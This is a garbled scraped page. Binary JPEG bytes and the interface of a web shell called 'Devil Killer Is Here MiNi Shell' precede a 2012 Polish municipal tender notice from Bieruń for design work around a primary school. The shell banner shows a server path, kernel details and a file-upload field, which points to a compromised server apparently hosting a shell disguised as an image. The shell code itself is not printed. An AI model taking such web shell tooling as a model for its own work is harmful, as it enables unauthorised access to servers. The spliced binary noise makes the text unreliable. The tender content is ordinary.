JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120328/70835-N-2012.html

<p class="kh_header"><b>Bieruń: Opracowanie dokumentacji projektowej  zagospodarowania                         terenu wokół SP-3</b><br>
<b>Numer ogłoszenia: 70835 - 2012; data zamieszczenia: 28.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej  zagospodarowania                         terenu wokół SP-3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowo - kosztorysowej zagospodarowania terenu wokół Szkoły Podstawowej nr 3 w Bieruniu wraz z uzyskaniem decyzji 
o pozwoleniu na budowę.
Dokumentację projektową należy opracować na podstawie istniejącej koncepcji zagospodarowania terenu, uwzględniając wybudowany w 2011 roku plac zabaw w ramach Rządowego Programu Radosna Szkoła. 
Kody Wspólnego Słownika Zamówień CPV:
71000000-8 Usługi architektoniczne, budowlane, inżynieryjne i kontrolne
71242000-6 Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów
71245000-7 Plany zatwierdzające, rysunki robocze i specyfikacje
71320000-7 Usługi inżynieryjne w zakresie projektowania
1.	Zakres prac. 
Projekt będzie obejmował zakresem zagospodarowanie obszaru o powierzchni 1,5 ha, zlokalizowanego pomiędzy ul. Węglową a ul. Warszawską, wraz z wykonaniem odwodnienia               (z uwzględnieniem wymiany istniejącej sieci kanalizacji sanitarnej i deszczowej) oraz budową oświetlenia (oświetlenie boisk oraz oświetlenie uliczne).
Elementy zagospodarowania:
a)	boisko do piłki nożnej,
b)	kompleks boisk sportowych wielofunkcyjnych (boisko do piłki ręcznej, boisko do siatkówki, boisko do koszykówki),
c)	bieżnia,
d)	skocznia do skoku w dal, 
e)	skocznia do skoku  wzwyż,
f)	ścieżka zdrowia,
g)	miejsce dla szachistów,
h)	zespół stołów do gry w tenisa stołowego,
i)	elementy małej architektury (ławki, kosze na śmieci, stojaki na rowery),
j)	zieleń,
k)	komunikacja terenu (wjazd, droga pożarowa, chodniki).
Dokumentację projektową należy opracować na aktualnych podkładach mapowych z nakładką ewidencji.
Wykonawca w ramach niniejszego zadania musi uzyskać:
- wypisy i wyrysy z ewidencji gruntów (aktualny stan ewidencji gruntów i budynków).
- mapy sytuacyjno-wysokościowe do celów projektowych (mapa ma być zgodna ze stanem  
  faktycznym w terenie - w tym celu należy m.in.:
- przeprowadzić wywiad terenowy, 
- wykonać pomiary terenowe mające na celu aktualizację istniejącej mapy zasadniczej, 
w tym zaznaczenie wszelkich obiektów budowlanych, usytuowania zieleni, pomiary urządzeń 
podziemnych o których nikt wcześniej nie wiedział, odszukanie istniejących punktów granicznych, uzgodnienie map w instytucjach branżowych.
Należy też wykonać dokumentację fotograficzną terenu objętego zadaniem.
Należy wykonać następujące opracowania:
1. Projekt budowlano-wykonawczy, który powinien zawierać w szczególności:
a)opis techniczny;
b)niezbędne obliczenia;
c) dokładny opis stosowanych materiałów i urządzeń;
d)opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ);
e) część rysunkową, tj.:
- projekt zagospodarowania (1:500),
- plan sytuacyjny - plansza wymiarowa (1:500),
- plan sytuacyjny - plan warstwicowy (1:500),
- przekroje charakterystyczne (1:50),
- profile podłużne (1:500/50),
- przekroje poprzeczne (1:100),
- inne rysunki elementów konstrukcji obiektów, instalacji oraz urządzeń - skala wg potrzeb.
2. Specyfikacje techniczne wykonania i odbioru robót budowlanych.
3. Przedmiary robót.
4.Kosztorysy inwestorskie i zbiorcze zestawienia kosztów.
5. Inwentaryzacja zieleni.
6. Badania geotechniczne oraz badania TV inspekcji kanalizacji.
Dokumentacja musi spełniać wszystkie wymogi konieczne do uzyskania decyzji o pozwoleniu
na budowę. Powinna uwzględnić uzyskanie wszelkich koniecznych uzgodnień, pozwoleń i decyzji administracyjnych dla realizacji w/w projektu.
2.Przepisy
Dokumentacja projektowo- kosztorysowa musi być opracowana zgodnie z:
-	Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U.113.2010.759
z późniejszymi zmianami), a w szczególności art.29 ust.3  Przedmiotu zamówienia nie wolno
opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to
uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia
za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy
lub równoważny oraz aktami wykonawczymi do tej ustawy,
- Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego
zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót
budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.202.2004.2072 z późn. zm.),
-	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod
i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac
projektowych oraz planowanych określonych w programie funkcjonalno-użytkowym
(Dz. U. 130. 2004.1389),
-	Ustawą o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg krajowych (Dz.U.193.2008.1194 z późn. zm.),
-	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U.243.2010.1623)
oraz zgodnie z aktami wykonawczymi do tej Ustawy, a w szczególności:
-	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji
dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia
(Dz.U.120.2003.1126),
-	Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U.92.2004.881) oraz aktami
wykonawczymi do tej ustawy,
-	Rozporządzeniem MSW i A z 05.98.1998 r. w sprawie aprobat i kryteriów technicznych oraz
jednostkowego stosowania wyrobów budowlanych (Dz.U.107.1998.679 z późn. zm.),
-	Ustawa z dnia 27.03.2003 r. O planowaniu i zagospodarowaniu przestrzennym
(Dz.U.80.2003.717 z poźn. zmianami),
-	Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 r. w sprawie
warunków technicznych, jakim powinny odpowiadać obiekty inżynierskie i ich usytuowanie
(Dz.U.63.2000.735 z poźn. zmianami),
-	Ustawą z 21.03.1985 r. o drogach publicznych (Dz.U.19.2007.115 z późn. zm.),
-	Ustawą Prawo wodne ( Dz.U.239.2005.2019 tekst jednolity),
-	Ustawą O Ochronie przyrody (Dz.U.92.2004.880 z póżn. zm.),
-	Ustawą Prawo ochrony środowiska (Dz.U. 25.2008.150 tekst jednolity),
-	Rozporządzeniem Rady Ministrów z dnia 09.11.2004 r. w sprawie określenia rodzajów
przedsięwzięć mogących znacznie oddziaływać na środowisko oraz szczegółowych
uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu
o oddziaływaniu na środowisko (Dz.U.257.2004.2573 z późn. zm.),
-	Ustawą z dnia 04.02.1994 r. Prawo geologiczne i górnicze (Dz.U.228.2005.1947 z późn. zm.),
-	Rozporządzeniem Ministra Infrastruktury z dnia 03.07.2003 r. w sprawie szczegółowych
warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U.220.2003.2181),
-	Rozporządzeniem Ministra Środowiska w sprawie projektu prac geologicznych
(Dz.U.153.2001. 1777),
-	Rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań, jakim powinna
odpowiadać dokumentacja hydrogeologiczna i geologiczno-inżynierska (Dz.U. 201.2005.1673)
-	Ustawą Prawo geodezyjne i kartograficzne ( Dz.U.240.2005.2027 tekst jednolity),
-	Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995 r.
w sprawie rodzajów i zakresu opracowań geodezyjno-kartograficznych obowiązujących
w budownictwie ( Dz.U. 25.1995.133),
-	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki
Żywnościowej w sprawie rozgraniczenia nieruchomości (Dz.U.45.1999.453) oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, ochrony środowiska),
przepisami techniczno-budowlanymi , normami, katalogami, wytycznymi, instrukcjami.
3.Uwagi końcowe
1)	Opracowana dokumentacja powinna być kompletna, co oznacza, że powinna zawierać
wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji 
     i dokumentów).
Dokumentacja musi spełniać wszystkie wymogi konieczne do uzyskania decyzji
o pozwoleniu na budowę. Powinna uwzględnić uzyskanie wszelkich koniecznych uzgodnień, pozwoleń i decyzji administracyjnych dla realizacji w/w projektu.
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie konieczne roboty związane z realizacją zagospodarowania terenu wokół SP3 w Bieruniu.
Projekty budowlane, przedmiary oraz specyfikacje techniczne wykonania i odbioru robót
należy wykonać:
- w wersji papierowej w 7 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach (na płytce CD: jedna w PDF, druga w wersji 
  przetwarzalnej).
Kosztorys inwestorski należy wykonać :
- w wersji papierowej w 2 egzemplarzach,
- w wersji elektronicznej w 2 egzemplarzach w wersji umożliwiającej jego przetwarzanie.
Dokumentacja musi odpowiadać wymaganiom Rozporządzenia Ministra Infrastruktury
z dn. 2.09.2004 r. w sprawie szczegółowej formy dokumentacji projektowej, specyfikacji
technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
(Dz.U.202.2004.2072 z późn. zm.)
2)	Przyjęte w trakcie projektowania rozwiązania, materiały oraz odstępstwa od koncepcji należy
konsultować z Zamawiającym oraz uzyskać jego akceptację.
3)	Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń
za pomocą parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących
na producenta.
4)	Zamawiający nie przewiduje udzielania zamówień uzupełniających, dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania  zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust.4 
ustawy pzp.
5)	Zamawiający nie dopuszcza składania ofert częściowych wariantowych.
6)	Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący
załącznik do SIWZ.
7)	Do obowiązków wykonawcy, w ramach wykonania przedmiotu zamówienia, będzie też
należał udział w procedurze wyboru wykonawcy robót budowlanych w zakresie udzielania
odpowiedzi na zapytania dot. rozwiązań zawartych w dokumentacji projektowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.20.00-6, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp). 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia każdy z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Posiadają wiedzę i doświadczenie:
Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	co najmniej jedną dokumentację techniczną   boiska sportowego o nawierzchni syntetycznej o pow. min. 1000 m2; 
oraz
b)	co najmniej jedną dokumentację techniczną zagospodarowania terenu wraz z zielenią oraz elementami małej architektury o pow. min. 2000 m2.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie  
 przedłożonych w ofercie: 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp),
-	wykazu wykonanych dokumentacji technicznych , z podaniem przedmiotu, dat wykonania 
i odbiorców oraz załączeniem dokumentów (np. referencji) potwierdzających, że usługi te zostały wykonane należycie.
Zamawiający nie uzna za spełnienie warunku, jeżeli wykonawcy przedstawią w wykazie usługi  
nie odpowiadające zakresem przedmiotowi zamówienia. 
   Przy ocenie spełnienia warunku za wykonane, zamawiający uzna te opracowania, które 
   zostały wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 
   okres prowadzenia działalności jest krótszy - w tym okresie.
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena oferty 
   nastąpi łącznie tzn. należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców                                                                                                                                                                                                                                                                                                                                                                                                                        
   w całej rozciągłości lub dwóch wykonawców spełnia go łącznie, poprzez wykazanie się 
   realizacją po jednym  z ww. projektów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń 
w specjalności konstrukcyjnej, a w przedmiotowym zamówieniu będzie uczestniczyć w wykonaniu 
zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp),
-	dokumentu: wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:         
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie       przedłożonego przez wykonawcę:
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz w pkt. Lista wymaganych dokumentów.
Zamiast dokumentu, o którym mowa w punkcie  3 Listy wymaganych dokumentów  przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.
       Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w pkt 1
        niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
    3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku   podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
         Treść zobowiązania podmiotu trzeciego powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
      5) Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących      sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
   6) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 
(np. konsorcjum/spółki cywilnej) do oferty należy dołączyć: 
  a) Informacje w zakresie stron wchodzących w skład podmiotu wspólnego oraz pełnomocnictwo  
           określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego zakresu działania   i uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo  należy załączyć 
 w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby 
 warunki, o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.  
